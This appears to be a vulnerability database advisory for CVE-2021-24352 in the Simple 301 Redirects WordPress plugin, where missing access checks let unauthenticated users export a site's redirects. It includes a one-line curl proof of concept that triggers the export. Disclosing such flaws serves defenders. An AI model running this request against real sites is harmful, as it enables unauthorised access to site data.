logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export

Description

The export_data function of the plugin had no capability or nonce checks making it possible for unauthenticated users to export a site's redirects.

Proof of Concept

curl -X POST --url "[URL]/wp-admin/admin-post.php?page=301options&export=true"

Affects Plugins

simple-301-redirects

Fixed in version 2.0.4

References

CVE

CVE-2021-24352

URL

https://www.wordfence.com/blog/2021/05/severe-vulnerabilities-patched-in-simple-301-redirects-by-betterlinks-plugin/

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Original Researcher

Chloe Chamberland

Submitter

Chloe Chamberland

Submitter website

https://wordfence.com

Submitter twitter

infosecchloe

Verified

Yes

WPVDB ID

d770f1fa-7652-465a-833c-b7178146847d

Timeline

Publicly Published

2021-05-26 (about 3 months ago)

Added

2021-05-26 (about 3 months ago)

Last Updated

2021-05-27 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin